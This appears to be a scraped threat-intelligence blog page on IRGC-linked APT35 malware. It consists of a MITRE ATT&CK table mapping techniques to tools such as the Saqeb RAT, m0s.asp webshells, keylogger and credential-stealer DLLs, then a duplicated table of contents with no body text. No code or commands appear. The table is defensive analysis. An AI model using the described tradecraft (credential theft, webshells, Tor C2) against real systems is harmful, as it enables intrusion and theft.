Execution	T1106 - Native API		CreateEventA, LoadLibrary, GetProcAddress	Saqeb main
Persistence	T1543 - Create or Modify System Process	T1543.003 - Windows Service	Service masquerading (WinUpdateService.exe, etc.)	RAT-2AC2
Persistence	T1547 - Boot or Logon Autostart Execution	T1547.001 - Registry Run Keys	Auto-run scheduling (daily/weekly)	Saqeb
Persistence	T1505 - Server Software Component	T1505.003 - Web Shell	m0s.asp, file.asp, webshell.asp deployed	Webshells
Privilege Escalation	T1543 - Create or Modify System Process	T1543.003 - Windows Service	Elevated service creation	RAT-2AC2
Defense Evasion	T1027 - Obfuscated Files or Information	T1027.002 - Software Packing	Hex encoding of modules (bin2hex.py)	Saqeb modules
Defense Evasion	T1027.007 - Dynamic API Resolution		LoadLibrary + GetProcAddress at runtime	Saqeb main
Defense Evasion	T1140 - Deobfuscate/Decode Files or Information		Runtime hex decoding, XOR decryption, string deobfuscation	Saqeb, webshells
Defense Evasion	T1036 - Masquerading	T1036.004 - Masquerade Task or Service	Legitimate service names (Microsoft, Exchange, Windows)	RAT-2AC2
Defense Evasion	T1036.008 - Masquerade File Type		.dat extensions for DLLs	Saqeb modules
Defense Evasion	T1070 - Indicator Removal	T1070.004 - File Deletion	Self-destruct capability ("Kill RAT")	Saqeb
Defense Evasion	T1112 - Modify Registry		Registry manipulation for persistence (minimal to avoid detection)	Saqeb
Defense Evasion	T1497 - Virtualization/Sandbox Evasion		Anti-VM techniques (training curriculum Section 8)	All malware
Defense Evasion	T1622 - Debugger Evasion		Anti-debug mechanisms	Saqeb (documented in manual)
Defense Evasion	T1562 - Impair Defenses	T1562.001 - Disable or Modify Tools	AV exclusion paths in file destruction module	rns.dll
Credential Access	T1555 - Credentials from Password Stores	T1555.003 - Credentials from Web Browsers	Firefox password extraction (nss3.dll abuse)	stler.dll (creds.dat)
Credential Access	T1552 - Unsecured Credentials	T1552.001 - Credentials In Files	Telegram session file theft	telg.dll (msg.dat)
Credential Access	T1056 - Input Capture	T1056.001 - Keylogging	SetWindowsHookEx keyboard hooking	klg.dll (logging.dat)
Discovery	T1082 - System Information Discovery		systeminfo command execution	RAT-2AC2, webshells
Discovery	T1083 - File and Directory Discovery		Disk-level file enumeration (Fexp function)	Saqeb main
Discovery	T1057 - Process Discovery		Process enumeration capabilities	All RATs
Discovery	T1033 - System Owner/User Discovery		whoami, username collection	All malware
Discovery	T1016 - System Network Configuration Discovery		ipconfig, network enumeration	Webshells, RATs
Discovery	T1049 - System Network Connections Discovery		netstat commands	Webshells
Discovery	T1518 - Software Discovery	T1518.001 - Security Software Discovery	AV detection (Kaspersky, BitDefender exclusions)	Saqeb, RAT-2AC2
Lateral Movement	T1021 - Remote Services	T1021.006 - Windows Remote Management	WMIC commands in webshell scripts	RCE4.py comments
Lateral Movement	T1080 - Taint Shared Content		File upload to UNC shares	Webshell comments (vmware-tools.exe example), connect.py
Collection	T1005 - Data from Local System		File download capabilities, Firefox/Telegram data extraction	Saqeb, RAT-2AC2
Collection	T1113 - Screen Capture		Screenshot functionality (capHandler)	Saqeb, RAT-2AC2
Collection	T1119 - Automated Collection		Automated file enumeration and exfiltration	Saqeb
Collection	T1056 - Input Capture	T1056.001 - Keylogging	Keyboard hook with window title logging	klg.dll
Command & Control	T1071 - Application Layer Protocol	T1071.001 - Web Protocols	HTTP/HTTPS C2 communication	All malware
Command & Control	T1132 - Data Encoding	T1132.001 - Standard Encoding	XOR encryption, Base64, hex encoding, substitution cipher	All malware
Command & Control	T1573 - Encrypted Channel	T1573.001 - Symmetric Cryptography	XOR-based traffic encryption	Saqeb
Command & Control	T1090 - Proxy	T1090.003 - Multi-hop Proxy	Relay servers + TOR (7 hops)	Saqeb
Command & Control	T1095 - Non-Application Layer Protocol		TOR network usage (.onion addresses)	Saqeb
Command & Control	T1571 - Non-Standard Port		Webshells on ports 9003, various custom ports	Episodes 1-2 evidence
Command & Control	T1001 - Data Obfuscation	T1001.002 - Steganography	Covert channel via Accept-Language header	m0s.asp variants
Command & Control	T1105 - Ingress Tool Transfer		Module download from C2 (dwPlugin function)	Saqeb
Exfiltration	T1041 - Exfiltration Over C2 Channel		Data exfiltration via HTTP POST	All malware
Exfiltration	T1020 - Automated Exfiltration		Scheduled data collection and transmission	Saqeb
Exfiltration	T1030 - Data Transfer Size Limits		Chunked file transfer (flwHandler)	Saqeb
Impact	T1486 - Data Encrypted for Impact

An Insider Look At The IRGC-linked APT35 Operations: Ep3 - Malware Arsenal & Tooling

Executive Summary

Analysis

Key Findings Summary

Malware Family Analysis

A. Saqeb System - Primary Windows RAT

Overview

Command & Control Panel

B. RAT-2AC2 - Secondary RAT Platform

Overview

Technical Specifications

API Endpoints

Security Implementation

Capabilities

Webshell Infrastructure

A. m0s.asp - Advanced ASP Webshell

Overview

Technical Implementation

Operational Use

B. file.asp / webshell.asp - Simpler Variants

Implementation

3. Target Intelligence

A. Targeting Pattern Analysis

B. SCADA/Industrial Targeting (from #78TPDD report)

C. Ransomware Scale (from #78TPDD report)

4. Detection & Prevention Guidance

Behavioral Detection

5. MITRE ATT&CK Mapping

References

Author

Predict Cyber threats against your organization

Secure your organisation with our Award winning Products

An Insider Look At The IRGC-linked APT35 Operations: Ep3 - Malware Arsenal & Tooling

Executive Summary

Analysis

Key Findings Summary

Malware Family Analysis

A. Saqeb System - Primary Windows RAT

Overview

Command & Control Panel

B. RAT-2AC2 - Secondary RAT Platform

Overview

Technical Specifications

API Endpoints

Security Implementation

Capabilities

Webshell Infrastructure

A. m0s.asp - Advanced ASP Webshell

Overview

Technical Implementation

Operational Use

B. file.asp / webshell.asp - Simpler Variants

Implementation

3. Target Intelligence

A. Targeting Pattern Analysis

B. SCADA/Industrial Targeting (from #78TPDD report)

C. Ransomware Scale (from #78TPDD report)

4. Detection & Prevention Guidance

Behavioral Detection

5. MITRE ATT&CK Mapping

References

Related Blogs

Predict Cyber Threats against your organization